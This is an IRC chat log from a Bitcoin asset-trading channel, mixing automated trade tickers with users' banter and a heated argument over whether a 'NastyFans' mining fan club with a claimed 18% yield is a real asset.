@ 0.2 = 1 BTC [+] Mar 16 17:16:07 [BTCTC] [COGNITIVE] 1 @ 0.17299 BTC [+] Mar 16 17:19:02 [BTCTC] [PAJKA.BOND] 13 @ 0.105 = 1.365 BTC [+] Mar 16 17:20:10 [BTCTC] [GSDPT] 150 @ 0.005198 = 0.7797 BTC [-] Mar 16 17:20:48 [BTCTC] [GSDPT] 560 @ 0.005199 = 2.9114 BTC [+] Mar 16 17:24:30 BitHub: hi Mar 16 17:24:51 Hello Mar 16 17:24:53 anyone seen namworld lately? Mar 16 17:25:09 ;;seen namworld Mar 16 17:25:09 namworld was last seen in #bitcoin-assets 7 hours, 37 minutes, and 5 seconds ago: Night all. Mar 16 17:27:16 wow Mar 16 17:27:19 asicminer @ 0.94 Mar 16 17:27:21 :D Mar 16 17:27:54 on btctc it's .8 on bitfunder :) Mar 16 17:28:00 yep Mar 16 17:28:09 i sold mine a little too cheap i think Mar 16 17:28:19 well, i got nice profits so whatever =) Mar 16 17:28:20 im cool Mar 16 17:28:56 no one ever went broke taking profits :) Mar 16 17:29:26 thats just stupid thing to say. Mar 16 17:31:43 [BTCTC] [S.DICE-PT] 97 @ 0.0054 = 0.5238 BTC [+] Mar 16 17:32:44 [MPEX] [S.MPOE] 31800 @ 0.00071181 = 22.6356 BTC [+] Mar 16 17:38:18 [BTCTC] [S.DICE-PT] 1 @ 0.00541 BTC [+] Mar 16 17:38:53 [BTCTC] [S.DICE-PT] 100 @ 0.005404 = 0.5404 BTC [-] Mar 16 17:39:16 [BTCTC] [S.DICE-PT] 302 @ 0.00541 = 1.6338 BTC [+] Mar 16 17:40:42 !help Mar 16 17:40:42 List of commands: Mar 16 17:40:43 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 16 17:40:44 !mp (desc: returns the response from MPEX order) Mar 16 17:41:02 [MPEX] [S.MPOE] 27900 @ 0.00070763 = 19.7429 BTC [-] Mar 16 17:41:03 [MPEX] [S.MPOE] 400 @ 0.00071181 = 0.2847 BTC [+] Mar 16 17:47:39 ;;estimate Mar 16 17:47:44 Next difficulty estimate | 5768719.44091 based on data since last change | 5650760.38918 based on data for last three days Mar 16 17:52:18 [BTCTC] [ASICMINER-PT] 2 @ 0.88 = 1.76 BTC [-] Mar 16 17:53:12 [MPEX] [S.MPOE] 17642 @ 0.00070501 = 12.4378 BTC [-] Mar 16 17:56:06 [HAVELOCK] [HIM] 1 @ 1.99 BTC [-] Mar 16 17:59:14 [MPEX] [S.MPOE] 1125 @ 0.00070327 = 0.7912 BTC [-] Mar 16 17:59:16 [MPEX] [S.MPOE] 26630 @ 0.00071181 = 18.9555 BTC [+] Mar 16 17:59:17 [MPEX] [S.MPOE] 9061 @ 0.00071738 = 6.5002 BTC [+] Mar 16 18:05:19 ;;goxlag Mar 16 18:05:20 0 seconds Mar 16 18:09:20 [MPEX] [S.MPOE] 10450 @ 0.00070015 = 7.3166 BTC [-] Mar 16 18:11:17 [BTCTC] [BTC-TRADING-PT] 2 @ 0.2597 = 0.5194 BTC [-] Mar 16 18:12:54 [BTCTC] [PAJKA.BOND] 2 @ 0.105 = 0.21 BTC [+] Mar 16 18:19:08 [HAVELOCK] [SDICE] 5 @ 0.54 = 2.7 BTC [+] Mar 16 18:22:44 [MPEX] [S.MPOE] 17200 @ 0.00071738 = 12.3389 BTC [+] Mar 16 18:36:15 [BTCTC] [ASICMINER-PT] 1 @ 0.89 BTC [+] Mar 16 18:41:52 [MPEX] [S.MPOE] 7300 @ 0.00070818 = 5.1697 BTC [-] Mar 16 18:41:53 [MPEX] [S.MPOE] 21600 @ 0.00070675 = 15.2658 BTC [-] Mar 16 18:45:07 [HAVELOCK] [SDICE] 3 @ 0.53001 = 1.59 BTC [-] Mar 16 18:45:09 [HAVELOCK] [SDICE] 5 @ 0.530001 = 2.65 BTC [-] Mar 16 18:45:10 [HAVELOCK] [SDICE] 7 @ 0.53000001 = 3.71 BTC [-] Mar 16 18:45:11 [HAVELOCK] [SDICE] 2 @ 0.522 = 1.044 BTC [-] Mar 16 18:45:12 [HAVELOCK] [SDICE] 3 @ 0.521 = 1.563 BTC [-] Mar 16 18:45:13 [HAVELOCK] [SDICE] 10 @ 0.52 = 5.2 BTC [-] Mar 16 18:45:14 [HAVELOCK] [SDICE] 1 @ 0.52 BTC [-] Mar 16 18:45:16 [HAVELOCK] [SDICE] 3 @ 0.5151 = 1.5453 BTC [-] Mar 16 18:45:17 [HAVELOCK] [SDICE] 3 @ 0.51501 = 1.545 BTC [-] Mar 16 18:45:17 [HAVELOCK] [SDICE] 20 @ 0.515 = 10.3 BTC [-] Mar 16 18:45:18 [HAVELOCK] [SDICE] 4 @ 0.513 = 2.052 BTC [-] Mar 16 18:45:19 [HAVELOCK] [SDICE] 8 @ 0.512 = 4.096 BTC [-] Mar 16 18:45:20 [HAVELOCK] [SDICE] 9 @ 0.511 = 4.599 BTC [-] Mar 16 18:45:21 [HAVELOCK] [SDICE] 5 @ 0.5105 = 2.5525 BTC [-] Mar 16 18:45:22 [HAVELOCK] [SDICE] 6 @ 0.5102 = 3.0612 BTC [-] Mar 16 18:45:23 [HAVELOCK] [SDICE] 4 @ 0.5101 = 2.0404 BTC [-] Mar 16 18:45:24 [HAVELOCK] [SDICE] 77 @ 0.51 = 39.27 BTC [-] Mar 16 18:49:35 [MPEX] [S.MPOE] 8450 @ 0.00070675 = 5.972 BTC [-] Mar 16 18:58:54 [MPEX] [S.MPOE] 16555 @ 0.00070418 = 11.6577 BTC [-] Mar 16 19:23:42 [MPEX] [S.MPOE] 2639 @ 0.00071738 = 1.8932 BTC [+] Mar 16 19:23:48 [MPEX] [S.MPOE] 9200 @ 0.00071767 = 6.6026 BTC [+] Mar 16 19:23:50 [MPEX] [S.MPOE] 7311 @ 0.00071815 = 5.2504 BTC [+] Mar 16 19:29:41 [BTCTC] [PAJKA.BOND] 16 @ 0.105 = 1.68 BTC [+] Mar 16 19:30:58 [BTCTC] [PAJKA.BOND] 33 @ 0.105 = 3.465 BTC [+] Mar 16 20:04:09 [BTCTC] [ASICMINER-PT] 1 @ 0.9 BTC [+] Mar 16 20:05:19 quiet in here today... Mar 16 20:06:06 indeed Mar 16 20:06:16 [NastyFans.org] [NASTY MINING] 2 @ 0.33 BTC [+] Mar 16 20:06:17 lol Mar 16 20:06:28 errybody silently waiting for the weekend dump Mar 16 20:06:49 I'm prepping myself for green beer... Mar 16 20:09:34 Still say assbot should list NastyFans trades... Sucks to be lumped in with the BS gigamining has going... Just sayin' Mar 16 20:10:13 yeah, this is -assets, not -fans kinda. Mar 16 20:10:29 what's in a name? Mar 16 20:10:49 ass bot doesnt cover fan sites Mar 16 20:11:14 so the inclusion of the word fan makes it not an asset in your mind? Mar 16 20:11:33 im not sure at this point. Mar 16 20:11:58 "In financial accounting, assets are economic resources. Anything tangible or intangible that is capable of being owned or controlled to produce value and that is held to have positive economic value is considered an asset. Simply stated, assets represent value of ownership that can be converted into cash (although cash itself is also considered an asset)." Mar 16 20:12:19 i dont see what that has to do with nasty fans? Mar 16 20:12:46 NastyFans seats are capable of being owned to produce value and ownership can be converted into cash. Mar 16 20:12:58 It fits the definition of an asset. Mar 16 20:14:04 [MPEX] [S.MPOE] 4500 @ 0.00071201 = 3.204 BTC [-] Mar 16 20:14:06 [MPEX] [S.MPOE] 6681 @ 0.00071815 = 4.798 BTC [+] Mar 16 20:14:25 Maybe I should donate one to you so you can see for yourself? Mar 16 20:15:35 nasty seats? dunno we are asset traders here and what not, not fans of anything in particular Mar 16 20:16:01 a company, a stock, an option, a future, an etf? Mar 16 20:16:06 fishfish|AFK !! Mar 16 20:16:17 I don't think you're ignorant enough to be caught up on a naming convention. So I assume you have an alterior motive. Mar 16 20:16:51 yes kakobrekla Mar 16 20:17:16 no afk plox tyvm. Mar 16 20:17:56 OgNasty can you answer the FabianBs question-s Mar 16 20:18:04 ill be back in like 20 min or so Mar 16 20:18:09 It is an asset. Mar 16 20:18:41 what kind of (in financial terms) Mar 16 20:19:01 for legal reasons I'd rather let people figure that out on their own Mar 16 20:19:17 Check this out... Mar 16 20:19:36 https://bitcointalk.org/index.php?topic=86854.0 Mar 16 20:20:30 18% yield... etc... Mar 16 20:21:49 then you might have to figure that out first Mar 16 20:22:16 I have everything figured out. ;) Mar 16 20:23:49 [BTCTC] [ASICMINER-PT] 15 @ 0.9 = 13.5 BTC [+] Mar 16 20:26:03 [MPEX] [S.DICE] 42 @ 0.00532425 = 0.2236 BTC [+] Mar 16 20:31:19 https://bitcointalk.org/index.php?topic=140769.0 <-- Why won't assbot list the 3rd most popular bitcoin asset? Story at 11. lol. "Uhh... I think dude that runs it can't grasp the name of the asset or something" Mar 16 20:33:48 i don't even look at a thread when i see the word nastyfans cause i ain't a fan and im sure there are others Mar 16 20:34:24 pigeons: sounds like you are an excellent finacial guru. You should share that wisdom with Warren Buffet. Mar 16 20:34:27 anyway, have you offered to push data to assbot (assuming nastyfans is a relevant asset) Mar 16 20:34:37 Yes, I have. Mar 16 20:35:04 i'm not claiming to be a financial guru. i'm stating a fact that calling something nastyfans is retarded Mar 16 20:35:17 I think judging something on a name is retarded. Mar 16 20:35:26 Wonder who's logic is more sound. Mar 16 20:37:13 [MPEX] [S.MPOE] 1000 @ 0.00070827 = 0.7083 BTC [-] Mar 16 20:37:13 [MPEX] [S.MPOE] 3674 @ 0.00070826 = 2.6021 BTC [-] Mar 16 20:37:19 [MPEX] [S.MPOE] 3626 @ 0.00070825 = 2.5681 BTC [-] Mar 16 20:37:57 "The yield on that asset is over 18%? Wow. Too bad I don't like the name." - No serious investor ever Mar 16 20:40:12 well, i know for legal reasons you won't tell us what it is, but what would you say someone else might call it Mar 16 20:40:34 pre-paid mining? Mar 16 20:40:40 I think most people would describe it as a company. Mar 16 20:40:49 "NASTYFANS: THE UNOFFICIAL NASTY MINING FANCLUB" Mar 16 20:40:55 We have other revenue sources in development besides just mining. Mar 16 20:40:58 and really, you are suprised no one bothers to look? Mar 16 20:41:11 lots of people look Mar 16 20:41:22 we have hundreds of individual asset owners. Mar 16 20:41:50 fan club members Mar 16 20:42:20 why the name hang up? Mar 16 20:42:27 [BTCTC] [PAJKA.BOND] 10 @ 0.105 = 1.05 BTC [+] Mar 16 20:42:40 [BTCTC] [ASICMINER-PT] 10 @ 0.9 = 9 BTC [+] Mar 16 20:42:50 not interested in joining a fan club for a miner Mar 16 20:43:41 even if the fan club donates bitcoins to you? Mar 16 20:43:44 i looked at the forum links you posted, couldnt find anything bout the 18% (per annum?) or any details. i do not doubt these returns, just interested in taking your advice and looking at it Mar 16 20:43:57 it's all public on the site and the thread. Mar 16 20:44:02 you didn't see the stats Mar 16 20:44:15 https://bitcointalk.org/index.php?topic=86854.0 Mar 16 20:44:16 the site is just a login page Mar 16 20:44:19 lots of stats right there Mar 16 20:44:45 i looked through several of the 48 pages and still don't see Mar 16 20:44:49 I'd say more stats and transparency than ANY OTHER asset. Mar 16 20:44:51 Try page 1 Mar 16 20:44:53 the OP Mar 16 20:45:38 nope don't see anything Mar 16 20:45:59 more transparent than s.dice? where everyone sees all the money going in and out? Mar 16 20:46:45 Every independent test I've seen done on s.dice shows that the amount of return they promise is a great deal from real returns. Mar 16 20:46:59 whereas everything listed on my thread is factual. Mar 16 20:47:24 but you can't see it, so I guess your ignorance is understandable. Mar 16 20:47:34 reading OPs is hard for trolls. Mar 16 20:47:48 they promise 100% of returns and you get them Mar 16 20:48:00 independently verified, dooglus does a good job Mar 16 20:48:01 go make a few bets then... haha Mar 16 20:48:16 we are talking about assets not gambling sites Mar 16 20:48:29 exactly Mar 16 20:48:31 maybe i'm confused, that's waht the nasty fan club is Mar 16 20:48:57 you are confused for sure. whether or not you are just trolling me is what I'm trying to decypher. Mar 16 20:48:58 please show me something indicating the return from s.dice profits is any less Mar 16 20:49:22 how did they cheat that? someone bet to a secret address? Mar 16 20:49:31 go make 100 bets on the 97% address and see what your return is for yourself. Mar 16 20:49:51 I'm not an independent auditor and I don't even care about S.DICE. I do my gambling at a casino, it's a social thing. Mar 16 20:50:04 S.DICE is profitting off the ignorance of the socially inept. Mar 16 20:50:23 Which I'm fine with, but can't figure out why I should care. Mar 16 20:50:52 i'm not talking about return on bets Mar 16 20:51:10 whatcu talkin' bout willis? Mar 16 20:51:13 you said your asset was more transparent Mar 16 20:51:44 Where is the page showing the P/E ratio of S.DICE shares, or the yield? Mar 16 20:51:49 [MPEX] [S.MPOE] 1450 @ 0.00071815 = 1.0413 BTC [+] Mar 16 20:51:49 it seems 100% of s.dice profits go to shareholders, and no one is disputing that Mar 16 20:51:57 https://docs.google.com/spreadsheet/ccc?key=0Aiec3-Eo_yO5dHB2dVdiaEltUHAtTWlBcFhXQVBYeGc#gid=0 Mar 16 20:52:19 except you Mar 16 20:52:26 not even eskimobob Mar 16 20:52:30 manually entered google spreadsheet does not equal transparency. Mar 16 20:52:42 Literally any numbers could be listed there... Mar 16 20:53:11 https://bitcointalk.org/index.php?topic=80312.msg1153334#msg1153334 Mar 16 20:53:43 i'm not in the satoshi dice fan club, but you stated that your fan club is the most transparent asset out there, and here is one we can compare Mar 16 20:54:20 which pools do you mine on? Mar 16 20:54:25 lots of manually entered numbers... Mar 16 20:54:35 If I show you pretty numbers will you send me all your BTC? Mar 16 20:54:36 lol Mar 16 20:54:47 i've checked the numbers myself, as have several in here Mar 16 20:54:51 I mine on lots of pools... Mar 16 20:55:10 i've never heard anyone talk about your fan club, and i thought maybe i will check some of the numbers if the pools are exposing that information Mar 16 20:55:35 well, with nastyfans everything is automated with numbers coming from 3rd parties. there is no need to check anything... the numbers come from where you'd check... Mar 16 20:55:43 cool, link? Mar 16 20:55:47 https://bitcointalk.org/index.php?topic=86854.0 Mar 16 20:55:52 3rd time's the charm? Mar 16 20:56:00 i looked at that, just a bunch of manually entered numbers, and not hte ones im looking for Mar 16 20:56:30 ok i looked again, seriously there is no information there whatsover about your mining profits Mar 16 20:56:32 those aren't manually entered numbers Mar 16 20:56:58 those are images... updated in real time with stats from the operation. Mar 16 20:57:09 the actual transactions and all that is on the nastyfans.org site. Mar 16 20:57:14 available for members to see. Mar 16 20:57:33 well, best of luck to you sir Mar 16 20:57:36 thanks for the info Mar 16 20:57:39 showing every donation and the path they all take... more info than any sane human would care to sift through, hence the automated stats. Mar 16 20:58:54 Not only that, but by not pretending to be a bank and refusing to hold BTC, our exchange is far superior to the competition. Which is why I suspect people in here are threatened by it. ;) Mar 16 20:59:54 honestly, i don't think people feel threatened. i think it doesn't look interesting to anyone here Mar 16 20:59:57 https://nastyfans.org/about Mar 16 21:01:03 When an asset that yields over 18% doesn't look interesting to you, something is wrong. You are entitled to your opinion though. Not all of us have decades of asset management under our belts I guess... Mar 16 21:01:44 how are we to know that your fan club yields over 18% a year. and yes i read your forum post Mar 16 21:02:10 you could look at the donation distributions and do the math if you don't trust the numbers on the OP... Mar 16 21:02:12 you wondered why no one in here is interested, and i think i'm pretty accurate in the reasons Mar 16 21:02:23 that doesnt mean your asset isnt a good deal or accurate Mar 16 21:02:34 your only reason is that you don't like the name... Mar 16 21:02:43 every other statement you've made is inaccurate. Mar 16 21:03:00 i dont like the name enough to sign up for a site that looks exactly like all the scams out there Mar 16 21:03:53 this isn't new... been operating almost a year... Mar 16 21:03:59 you can be upset people aren't giving your fan club a fair chance because of surface misconceptions, but that is happening Mar 16 21:04:05 http://blockchain.info/address/1EwtTKJaXAtctSFqCQKU3LiCg9dqYPEkxN <-- feel free to check out the donation chains. Mar 16 21:04:16 yeah i saw you in the forum a year ago, and it wasnt interesting Mar 16 21:04:18 people are giving it a fair chance... Mar 16 21:04:19 bah mining bonds Mar 16 21:04:28 it isn't a mining bond... lol Mar 16 21:04:33 what is it Mar 16 21:04:40 i read your post it says its a fan club Mar 16 21:04:42 a smart investor would know. Mar 16 21:04:50 that's what pirate folks said Mar 16 21:04:56 i cant tell you your not smart enough Mar 16 21:05:16 not if you can't use "you're" correctly. haha Mar 16 21:05:17 ok im not smart enough to know how a fan club can pay me money Mar 16 21:05:30 i'm hoping to hearing bout it Mar 16 21:05:35 simple concept. Mar 16 21:05:42 you join fan club and own a seat Mar 16 21:05:49 I mine coins and donate them to the fan club Mar 16 21:06:04 fan club distributes the donated coins to members based on the number of seats Mar 16 21:06:22 thank you. not interested. Mar 16 21:07:11 I'm not trying to get you interested. I just wanted to know what kind of bureaucracy was behind not listing nasty trades by assbot. Mar 16 21:07:34 basically its not interesting Mar 16 21:07:49 I disagree. Mar 16 21:07:59 it is more interesting than 90% of the stuff listed by assbot. Mar 16 21:08:00 do you have a channel you stream them to so people don't have to register for the fan club? Mar 16 21:08:12 the trades? yes. Mar 16 21:08:18 cool, that's a start Mar 16 21:08:20 https://nastyfans.org/buys.csv Mar 16 21:08:40 people who choose to list their assets publicly are: https://nastyfans.org/list.csv Mar 16 21:08:54 Again, all on the OP of my thread. Mar 16 21:09:08 [HAVELOCK] [HIM] 2 @ 1.99 = 3.98 BTC [-] Mar 16 21:09:09 Should I post that link a 4th time? lol Mar 16 21:09:09 [HAVELOCK] [HIM] 2 @ 1.99 = 3.98 BTC [-] Mar 16 21:09:10 [HAVELOCK] [HIM] 10 @ 1.999 = 19.99 BTC [+] Mar 16 21:09:17 no maybe you should re-write it though Mar 16 21:09:42 smarter people than you or I are behind the writing and there are reasons for it. Mar 16 21:10:14 these bitcoin assets are in fantasyland with their naming conventions... Mar 16 21:10:44 I have enough experience with publicly traded assets to know that it's all BS and the exchanges will fold just like GLBSE when pressure gets put on them. Mar 16 21:11:48 Don't act like my asset is "stupid" and "not interesting" because I'm prepared for the "when" while everyone else is thinking about the "if" Mar 16 21:13:30 its not interesting cause i thought its a mining bond. you tell me its not a mining bond but you wont tell me what it is. it has nothing to do with that you think legal issues go away ...cause fanclub Mar 16 21:15:16 well, then wait and see what we have in store next and maybe it will be more interesting and you'll become a fan. Mar 16 21:16:14 alright. thanks for the information Mar 16 21:18:03 If we were to be looked at as a mining bond, then an accurate claim might be that we're a mining bond which will increase from 1mh/s to 42mh/s over the coming 6 months. ;) So if difficulty jumps by 40x and BTC price falls, it would be a bad bond to buy (but it isn't a bond, it's an operation). Mar 16 21:18:47 yes i see mining operation would be more accurate than mining bond Mar 16 21:18:54 With that being said, until the next time I grace this channel to again question the validity of not listing the 3rd most popular asset. :) Mar 16 21:19:06 [MPEX] [S.MPOE] 914 @ 0.00071815 = 0.6564 BTC [+] Mar 16 21:19:07 [MPEX] [S.MPOE] 4736 @ 0.00071954 = 3.4077 BTC [+] Mar 16 21:19:31 Hopefully next time our market value will be in the millions. ;) Happy St. Paddy's Day tomorrow. Stay safe. Mar 16 21:20:26 well kakobrekla, why aren't you listing it? Mar 16 21:21:11 what weere ognasty talking about Mar 16 21:21:11 ? Mar 16 21:21:29 what asset+ Mar 16 21:21:29 ? Mar 16 21:21:36 ognasty would like his fan club trades to be streamed to this channel Mar 16 21:21:46 hmm? Mar 16 21:21:48 why not? Mar 16 21:22:15 i asked kako above Mar 16 21:25:02 [MPEX] [S.MPOE] 9864 @ 0.00071954 = 7.0975 BTC [+] Mar 16 21:25:02 [MPEX] [S.MPOE] 9246 @ 0.00071961 = 6.6535 BTC [+] Mar 16 21:30:01 [MPEX] [S.MPOE] 7250 @ 0.00071809 = 5.2062 BTC [-] Mar 16 21:39:40 cause the lame-o-meter reads too high. Mar 16 21:40:27 I have enough experience with publicly traded assets to know that it's all BS and the exchanges will fold just like GLBSE when pressure gets put on them. << Mar 16 21:40:30 document that please ? Mar 16 21:41:32 but that is a maybe << avalon is doing about as well, ain't it ? Mar 16 21:41:59 why are people paying .95 when AM is on BF for .8? << prolly cause bf won't stream ? Mar 16 21:45:19 I'd say more stats and transparency than ANY OTHER asset. << now you're just being an ass. Mar 16 21:45:25 o, he conveniently left. heh. Mar 16 21:47:55 [MPEX] [O.BTCUSD.C410T] 4 @ 0.23 = 0.92 BTC [+] Mar 16 21:50:19 lol Mar 16 21:51:15 who knew securites law allows you to circumvent by calling your operation a fan club Mar 16 21:51:46 for the record Mar 16 21:51:47 20:45.49 ( kakobrekla ) also im not even thinking of listing someone who is not at least semi active in assets Mar 16 21:53:14 actually reviewing my logs, this guy is on the record logging in under a fake name but with his own ip to "cast aspersions on my morality" or somesuch. Mar 16 21:53:20 weird character. Mar 16 21:53:28 which name? Mar 16 21:53:35 1 sec Mar 16 21:54:42 was it nefario? Mar 16 21:54:46 muahah. Mar 16 21:54:53 lol Mar 16 21:56:46 http://pastebin.com/wD0S2g8x Mar 16 21:56:52 bastone, as it turns out. Mar 16 21:57:13 ;;seen bastone Mar 16 21:57:14 bastone was last seen in #bitcoin-assets 23 weeks, 6 days, 0 hours, 2 minutes, and 54 seconds ago: I'm not going to take the time to look it up. Mar 16 21:57:29 well im not going to take the time to look up nasty so FU Mar 16 21:57:44 Sep 30 22:32:36 this glbse thing you ask about is a blip. Mar 16 21:57:48 jesus i rule, in retrospe4ct. Mar 16 21:57:53 [BTCTC] [BTC-BOND] 2 @ 0.009989 = 0.02 BTC [+] Mar 16 21:58:12 [BTCTC] [ASICMINER-PT] 1 @ 0.86 BTC [-] Mar 16 21:58:14 [BTCTC] [ASICMINER-PT] 1 @ 0.85 BTC [-] Mar 16 21:58:14 Sep 30 22:32:36 this glbse thing you ask about is a blip. Mar 16 21:58:21 kakobrekla i remember he had a god awful logo but upon suggestion fixed it. perhaps in time Mar 16 21:58:40 you call that fixed? Mar 16 21:59:38 want, you dont see green? Mar 16 21:59:43 wait* Mar 16 21:59:45 [MPEX] [S.MPOE] 9300 @ 0.00071961 = 6.6924 BTC [+] Mar 16 22:00:07 im colorblind. Mar 16 22:00:09 dollars dont interest mp. Mar 16 22:00:39 yeah it would be better gray only Mar 16 22:00:49 lucky. Mar 16 22:02:32 aand deposits flushed Mar 16 22:08:41 [MPEX] [S.MPOE] 3600 @ 0.00071961 = 2.5906 BTC [+] Mar 16 22:14:49 [MPEX] [S.MPOE] 4911 @ 0.00071961 = 3.534 BTC [+] Mar 16 22:14:50 [MPEX] [S.MPOE] 1889 @ 0.00072266 = 1.3651 BTC [+] Mar 16 22:17:02 i missed this whole ognasty conversation, I must have him blocked from some other name too (and ive only been here a couple mos or so) Mar 16 22:17:17 i'm guessing that Bicknelski guy Mar 16 22:17:26 or however it was spelled Mar 16 22:19:44 the drama is strong today it seems Mar 16 22:24:44 BG still beating BCTC on AM 24-hr volume ฿476 to ฿320 Mar 16 22:25:13 BG=BF Mar 16 22:29:15 lol this sounds like a bet. Mar 16 22:31:25 I'd rather see "Asicminer shares will reach ฿1.25 BTC" Mar 16 22:31:38 or such Mar 16 22:31:46 what's a good amount? Mar 16 22:32:02 at about .87 now Mar 16 22:37:07 ill bet you they don't pass 1. Mar 16 22:37:58 [MPEX] [S.MPOE] 17350 @ 0.00072266 = 12.5382 BTC [+] Mar 16 22:38:07 how much? Mar 16 22:39:42 make a bet lol Mar 16 22:39:59 i submitted 1.35 Mar 16 22:40:35 but thats more the community to ponder Mar 16 22:40:39 i wouldnt bet that high Mar 16 22:40:45 i would bet on 1 though Mar 16 22:40:59 hell, someone could take it up to 1 today with 200btc Mar 16 22:44:31 hm that;s a point Mar 16 22:54:44 kakobrekla, speaking about BF, did you come to some conclusion with ukto about streaming trades? Mar 16 22:55:02 he asked for spec i have him spec Mar 16 22:55:09 gave* Mar 16 22:55:19 fuck ze kezyboard. Mar 16 22:57:23 if that's nasty non-mining-bond is so good, why no passthroughs then? Mar 16 22:57:36 it should have 5 each on bf and btct Mar 16 22:57:52 kako, is web sockets something you'll just end up implementing inevitably anyway? Mar 16 22:58:10 [MPEX] [S.BBET] 5000 @ 0.0019 = 9.5 BTC [+] Mar 16 22:58:14 for assbot? Mar 16 22:58:24 [MPEX] [S.BBET] 5000 @ 0.00195 = 9.75 BTC [+] Mar 16 22:58:28 yeah Mar 16 22:58:39 [MPEX] [S.MPOE] 2550 @ 0.00072266 = 1.8428 BTC [+] Mar 16 22:58:47 like is it a sensible progression Mar 16 22:59:17 well, the rate of posting would need to be high to justify it, but then again then its questionable if irc can handle that Mar 16 23:00:09 i wonder how long it will be til that becomes a problem Mar 16 23:00:17 probably never Mar 16 23:00:19 irc is a 1 second/line rule iirc Mar 16 23:00:37 and they're not likely to change it. we would have to make our own irc server/equiv of freenode first Mar 16 23:00:45 which is not undoable but certainly not called for yet Mar 16 23:00:47 you can do more in a row Mar 16 23:00:55 or just have a web page the streams Mar 16 23:00:58 but if you go over 1 a sec over prolonged period Mar 16 23:00:59 kakobrekla still, that's what they recomend Mar 16 23:01:00 you have problem Mar 16 23:01:01 s Mar 16 23:01:03 also Mar 16 23:01:17 it will be impossible to chat Mar 16 23:01:35 kak ya i imagine assbot will stop streaming and make hourly update summaries or somesuch Mar 16 23:01:45 theres -assets-trades Mar 16 23:01:56 [MPEX] [S.BBET] 2210 @ 0.00197 = 4.3537 BTC [+] Mar 16 23:01:58 [MPEX] [S.BBET] 5000 @ 0.001975 = 9.875 BTC [+] Mar 16 23:02:01 [MPEX] [S.BBET] 5000 @ 0.00198 = 9.9 BTC [+] Mar 16 23:02:03 [MPEX] [S.BBET] 740 @ 0.001985 = 1.4689 BTC [+] Mar 16 23:02:06 o.o Mar 16 23:02:09 [MPEX] [S.BBET] 7050 @ 0.002014 = 14.1987 BTC [+] Mar 16 23:02:15 also in the news, bbet beats asicminer Mar 16 23:03:31 those were ipo shares Mar 16 23:03:38 at least ending with. Mar 16 23:07:00 o ipo got hit ? sweet. Mar 16 23:09:45 o wait no Mar 16 23:09:56 not sure at least Mar 16 23:10:06 someone made 10k blocks priced differently Mar 16 23:10:22 what a trick. Mar 16 23:10:58 haha Mar 16 23:11:11 interesting concept Mar 16 23:11:15 i wonder Mar 16 23:11:25 hm, do you suppose he was like "o, they're buying their own shares" ? Mar 16 23:11:43 lol Mar 16 23:11:57 maybe just wanted to blend in for aesthetic reasons Mar 16 23:12:07 :DD Mar 16 23:12:17 a big wall would look scarier Mar 16 23:12:22 1 satoshi diff makes it better Mar 16 23:12:35 you know that may be right Mar 16 23:12:56 we're gonna end up with a degree in field psychology from watching btc trading Mar 16 23:13:04 :DD Mar 16 23:13:14 [MPEX] [S.MPOE] 6124 @ 0.00072266 = 4.4256 BTC [+] Mar 16 23:13:16 [MPEX] [S.MPOE] 13976 @ 0.00072268 = 10.1002 BTC [+] Mar 16 23:13:19 i definitely use tricks in pricing Mar 16 23:14:11 i just decide what i'm willing to pay for each fan club and offer that Mar 16 23:14:26 rofl Mar 16 23:15:13 it's field psychiatry in some cases Mar 16 23:15:19 jurov :p Mar 16 23:15:26 [BTCTC] [ASICMINER-PT] 1 @ 0.89 BTC [+] Mar 16 23:18:22 mircea_popescu https://bitcointalk.org/index.php?topic=153979.0 Mar 16 23:18:46 [BTCTC] [ASICMINER-PT] 19 @ 0.9 = 17.1 BTC [+] Mar 16 23:18:49 [BTCTC] [ASICMINER-PT] 2 @ 0.9 = 1.8 BTC [+] Mar 16 23:18:59 lol Mar 16 23:19:15 lol what is up with the fan club thing? Mar 16 23:19:42 dunno, that whole thing seems nasty. Mar 16 23:20:06 MJR_ i have no idea. Mar 16 23:20:32 im not even sure what the thing is. i hate these sites that make you log in Mar 16 23:20:44 yeah Mar 16 23:20:51 if you were a smart investor, you'd know ;) Mar 16 23:21:01 hahaha Mar 16 23:21:02 pigeons stop cranking me up Mar 16 23:21:13 people will come knocking for comedy show Mar 16 23:21:22 lol Mar 16 23:21:40 i'm here all week, tip your assbot Mar 16 23:21:41 im not an investor at all, im just the devil of bitcoin. Mar 16 23:22:13 incidentally, how long till satoshi comes back from the heavens to banish the devil ? it could make nice paintings and all. Mar 16 23:22:27 lol Mar 16 23:22:41 could satoshi prove he was satoshi? Mar 16 23:22:41 the cryber christ. Mar 16 23:22:56 singing with the coins for first block should do it Mar 16 23:23:00 the saint georgecoin Mar 16 23:23:01 from Mar 16 23:23:04 or would it be coingeorge ? Mar 16 23:23:12 hell... maybe boy george had it sorta right all along Mar 16 23:23:31 lol Mar 16 23:23:44 well that is unless he spent them all Mar 16 23:24:32 hmmm, wait he'd only need to sign a message from that address Mar 16 23:24:50 well yea Mar 16 23:25:12 not actually have any coins in it Mar 16 23:25:20 if he still has the wallet. Mar 16 23:25:26 yeah just priv key from that addy Mar 16 23:25:28 course it wasn't encrypted at the time Mar 16 23:25:33 so a good argument could be made someone else found it Mar 16 23:25:47 iirc those coins are still there Mar 16 23:26:20 i dont give enough shit to check Mar 16 23:27:48 it's funny though, you see his chat logs pasted around like bible verses Mar 16 23:28:01 you do? Mar 16 23:28:43 lol at "Guest476845654". it looks so inconspicuous Mar 16 23:28:49 esp since freenode uses 5 digits Mar 16 23:28:49 [BTCTC] [PAJKA.BOND] 30 @ 0.105 = 3.15 BTC [+] Mar 16 23:29:20 known ip? Mar 16 23:29:37 satoshi or guest? satoshi used tor Mar 16 23:29:48 guest :p Mar 16 23:29:55 smart satoshi. Mar 16 23:32:00 ok, finally getting ready to move the mpex trade engine to its new home. Mar 16 23:32:11 trading will be stopped in one hour. Mar 16 23:32:16 trading should resume in about 10 minutes. Mar 16 23:38:17 [MPEX] [S.MPOE] 12698 @ 0.00072268 = 9.1766 BTC [+] Mar 16 23:38:19 [MPEX] [S.MPOE] 12800 @ 0.00072441 = 9.2724 BTC [+] Mar 16 23:38:21 [MPEX] [S.MPOE] 1702 @ 0.00072563 = 1.235 BTC [+] Mar 16 23:40:26 And Satoshi entered the Blockchain and drove out all who sold and bought in the Blockchain, and he overturned the tables of the money-changers and the seats of those who sold pigeons. Mar 16 23:41:02 ahahaha Mar 16 23:41:05 lol there ya go pigeons.. even Matthew 21:12 mentions you Mar 16 23:41:07 you're talented, can you also draw ? 